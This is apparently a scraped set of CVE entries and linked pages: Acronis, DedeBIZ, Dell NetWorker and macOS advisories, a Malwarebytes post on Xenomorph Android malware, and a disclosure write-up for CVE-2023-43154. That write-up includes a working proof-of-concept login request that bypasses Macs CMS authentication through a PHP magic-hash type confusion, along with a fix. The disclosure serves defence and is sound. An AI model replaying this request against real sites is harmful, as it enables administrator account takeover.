Sensitive information disclosure due to cleartext storage of sensitive information. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.

CVE-2023-44159

A stored cross-site scripting (XSS) vulnerability in the Website column management function of DedeBIZ v6.2.11 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the title parameter.

**下载程序**

国内流行的内容管理系统多端全媒体解决方案，采用GPLv2协议完全开放源代码，DedeBIZ具有很强的可扩展性，并且完全开放源代码。DedeBIZ支持采用现流行的Go语言设计开发，拥有简单易用、灵活扩展特性之外更安全、高效。

下载正式版 代码托管 升级程序

最新版本：V6.2.12（2023-09-28） 查看更新记录 最新开发版

**下载商业组件**

DedeBIZ商业组件采用Go开发，面向Dede商业支持用户，目的是提升DedeBIZ系统性能和安全性，DedeBIZ商业组件将会成为使用系统构建商业化站点得力工具。

下载Linux amd64 下载Windows amd64

**发布通知**

可以通过关注微信DedeBIZ公众号，获取最新开发信息。

CVE-2023-43232: DedeBIZ下载 - DedeBIZ管理系统

Sensitive information disclosure due to improper authorization. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.

CVE-2023-44205

Sensitive information disclosure and manipulation due to improper authorization. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.

CVE-2023-44206

In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account.

**CVE-2023-43154 - Macs Framework v1.1.4f CMS Type Confusion Vulnerability****Table of Contents**

1.  Overview
2.  Proof of Concept
3.  Technical Debrief
4.  Mitigation

**Overview**

**CVE-ID**: CVE-2023-43154

**CVSS 3.1**: 9.8

**Vulnerability Description**: A loose comparison in the isValidLogin() function results in a PHP type confusion vulnerability that can be abused to bypass authentication and takeover the administrator account.

**Vulnerable Parameters**: The username and password of the users on the CMS.

**Affected Products**: Macs Framework v1.14f - Content Management System

**Limitations**:

1.  The username of the victim account must be previously known or a zero-like string
2.  The password used with the account must result in a "magic hash".

**User Interaction Required**: None

**References**: https://github.com/ally-petitt/CVE-2023-43154-PoC

**Discovery Date**: September 7, 2023

**Reported By**: Ally Petitt

**Proof of Concept**

Logging in at the URI /index.php/main/cms/login with the username of the victim account and any password that results in a magic hash will lead to authentication bypass.

A sample login is shown below.

**Send Payload**

    POST /index.php/main/cms/login HTTP/1.1
    Host: 172.17.0.2
    Content-Length: 62
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.17.0.2
    Referer: http://172.17.0.2/index.php/main/cms/login
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=di4ceqcv9432vcb0p27rkh7k82
    Connection: close
    
    ajaxRequest=true&&username=testadmin&password=0gdVIdSQL8Cm&scrollPosition=0
    

**HTTP Response**

    HTTP/1.1 200 OK
    Date: Sat, 09 Sep 2023 02:01:26 GMT
    Server: Apache/2.4.25 (Debian)
    X-Powered-By: PHP/5.6.40
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Length: 72
    Connection: close
    Content-Type: text/html; charset=ISO-8859-1
    
    <script>window.location.href="http://172.17.0.2/index.php/home"</script>
    

The status code of 200 and the redirect to /index.php/home are both indications that the login attempt was successful. The password of testadmin was not the password used in the login attempt (0gdVIdSQL8Cm). Instead, it was set to QNKCDZO.

**Technical Debrief**

When a user attempts to log in, their supplied password is hashed and and sent as a parameter to the isValidLogin() function via the initial login() function that is called when a POST request is made to /index.php/Main/CMS/login.

        public function login()
        {      
          if($this->isValidLogin(Post::getByKey('username'), $this->encrypt(Post::getByKey('password')) ) || ( $this->isAdminLoggedIn() ))
          --snip--
        }
    

The isValidLogin() function begins on line 83 of file /Application/plugins/CMS/controllers/CMS.php. It is vulnerable to a type confusion vulnerability due to its use of 2 equal signs instead of 3.

        private function isValidLogin($username, $password)
        {
          $this->loadModels();
          
          $loggedIn = false;
    
          foreach (Config::$editInPlaceAdmins as $key=>$account)
          {
            if(( $account['username'] == $username) && ($account['password'] == $password ) )
            {
              $loggedIn = true;
              Session::set('AdminLoggedIn', $account);
              break;
            }
          }
    

As shown in the if statement, the username and password are being checked with a loose comparison, leading to a PHP type confusion vulnerability. This can be abused when logging in with a password that results in a magic hash, or hash that is interpretted by PHP to have the value 0 during a loose comparison. A list of such passwords can be found here.

To exploit this, it is important to first understand the format that $account['password'] is stored in. In the function used to save a new user account on line 730 of the aforementioned CMS.php file, it becomes clear that the password is first passed through an encrypt function before it is stored.

      $password = $this->encrypt(Post::getByKey('password'));
      $confirmPassword = $this->encrypt(Post::getByKey('confirmPassword'));
      -- snip --
      private function saveNewUser( $username, $password, $emailAddress, $roleId)
    

Continuing to the function that is called after the password is run through encrypt, the following code is used:

        private function saveNewUser( $username, $password, $emailAddress, $roleId)
        {
          --snip--
                $this->usersModel->insertUser($username, $password, $emailAddress, $roleId);
          --snip--
        }
    

Based on the code above, it is apparent that the "encrypted" password was placed directly into the users Model of the MVC framework. Finally, to exploit this vulnerability, it is necessary to understand how the encrypt function works as its output is being directly compared against the user input.

        private function encrypt( $string )
        {      
          return md5($string);
        }
    

The encrypt function returns the MD5 hash of the string passed to it. This means that when the login() function is called with the user-supplied credentials, the inputted password is hashed and compared against the stored MD5 hash of the victim account.

The implication is that when using a password that results in a PHP collision, or magic hash, it will register as being equivilent when compared against a stored password that also follows the format of a magic hash. As a result, a very large number of passwords can be used to authenticate to and takeover the administrator account, even when the initial password is not previously known.

**Mitigation**

This vulnerability can be mitigated by changing the loose comparison in the isValidLogin() function to a strict comparison by replacing == with ===.

CVE-2023-43154: GitHub - ally-petitt/CVE-2023-43154-PoC: PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.

Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.

CVE-2023-43291: CVE-2023-43291.md

A permissions issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14. An app may be able to access sensitive user data.

CVE-2023-23495: About the security content of macOS Sonoma 14

A use-after-free vulnerability exists in the footerr functionality of Hancom Office 2020 HWord 11.0.0.7520. A specially crafted .doc file can lead to a use-after-free. An attacker can trick a user into opening a malformed file to trigger this vulnerability.

CVE-2023-32541: TALOS-2023-1759 || Cisco Talos Intelligence Group


Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.



**Impact**

High

**Details**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-28055

Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.

8.8

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-28055

Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.

8.8

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

CVEs Addressed

Product

Software/Firmware

Affected Versions

Remediated Versions

Link

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.9, 19.9.0.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.8  
through 19.8.0.2

Versions 19.8.0.3

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.7 through 19.7.0.4

Versions 19.7.0.5

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Version 19.7.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVEs Addressed

Product

Software/Firmware

Affected Versions

Remediated Versions

Link

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.9, 19.9.0.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.8  
through 19.8.0.2

Versions 19.8.0.3

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.7 through 19.7.0.4

Versions 19.7.0.5

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Version 19.7.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

**Revision History**

**Revision**

**Date**

**Description**

1.0

2023-09-26

Initial Release

2.0

2023-09-27

Added Point 4 Under "Additional Info" Section

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Additional Information**

1.  Platforms: Windows & Linux (All variants and flavors are impacted)
2.  Impacted Components: Dell NetWorker NW Client
3.  Since the capability to modify server files remotely was added in 19.7, this vulnerability is not applicable to Versions prior to 19.7.
4.  Dell recommends that you always upgrade to the latest release/version for your product

NetWorker Family, NetWorker, NetWorker Series, NetWorker Module, Product Security Information

CVE-2023-28055: DSA-2023-294: Security update for Dell NetWorker NW Client vulnerabilities

Categories: Personal
Tags: android

Tags:  xenomorph

Tags:  malware

Tags:  phone

Tags:  google play

Tags:  cryptocurrency

We take a look at a new Android scam involving Xenomorph malware and a hunt for cryptocurrency credentials.



(Read more...)




The post Xenomorph hunts cryptocurrency logins on Android appeared first on Malwarebytes Labs.

Cryptocurrency owners should take heed of warnings related to Xenomorph malware—Bleeping Computer reports that the most recent version of Xenomorph now targets various cryptocurrency wallets using fake browser update messaging as bait.

Xenomorph is roughly a year old, first springing to prominence after an installation campaign via the Google Play store resulted in more than 50,000 hijacked Android phones. At the time, Xenomorph crept into the official Android store via false pretences.

As with so many mobile scams, pretending to be a system cleaning tool worked like a charm and it bypassed some security measures by grabbing the rogue component only after installation. In other words: Google Play wouldn’t have noticed anything untoward, because at time of initial installation, everything looked normal.

The malware abused permissions to log SMS, intercept notifications, and use overlays to grab login details for up to 56 different banks.

This on its own is already very malicious behaviour. A year later, Xenomorph is back with an impressive sequel in tow. It would be more accurate to say that this is part 5, after several revisions over the past 12 months which have seen Xenomorph be distributed in new ways and include new features, like multi-factor authentication bypass and cookie stealing.

The new attack involves the use of that well-worn tradition, the fake browser update landing page. Bogus “Your Chrome needs updating” pages convince visitors to download and install the new rogue Android file.

At this point, Xenomorph deploys its most favoured tactic: That of the bogus overlay. These overlays mimic various banks and (now) logins for multiple cryptocurrency services like Metamask.

We’ve warned of the dangers of handing over your cryptocurrency secret recovery phrase to random websites and extensions many times. Even folks who are well versed in these kinds of scams may not realise a genuine looking overlay is coming from an entirely unrelated Android installation.

This latest version is said to target “more than 100 different targets” making use of crafted pages to try and swipe the user’s details. It also includes a so-called “mimic” feature which allows the malware to launch bogus activity from otherwise legitimate services. As Bleeping Computer notes, this technique means the fraudsters don’t need to hide icons from the app launcher which many security tools would note as potentially dubious behaviour.

Xenomorph does a lot of this, like simulating user taps at specific screen locations and preventing the system from going to sleep, which is a boon for staying in contact with the Command & Control setup issuing orders.

The researchers who made these discoveries also mention that the infrastructure hosting the rogue files contained additional malware, malware loaders, and Windows information stealers.

There’s a good chance some of these other files may already be in circulation, or could be at some point in the near future. If you receive browser update warnings while looking at websites, don’t hit that download button.

Browser updates don’t typically announce the need to do so in the middle of your browser, and especially not when surfing. Notifications for updates are placed away from the browser window, typically inside the user interface of the browser itself. For example, to the right of your URL bar. Browsers will also tend to update automatically without you doing anything. If you want to know whether or not an update is needed, clicking into “Help” or “About” will usually get the job done.

Whether on mobile or desktop, we strongly recommend keeping your updates set to automatic. Let the browser do its job and help to keep you secure, and do your bit by ignoring any popups or in-browser messaging with an urgent notification about supposed browser updates.

**We don’t just report on Android security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your Android devices by downloading Malwarebytes for Android today.

Tag

#windows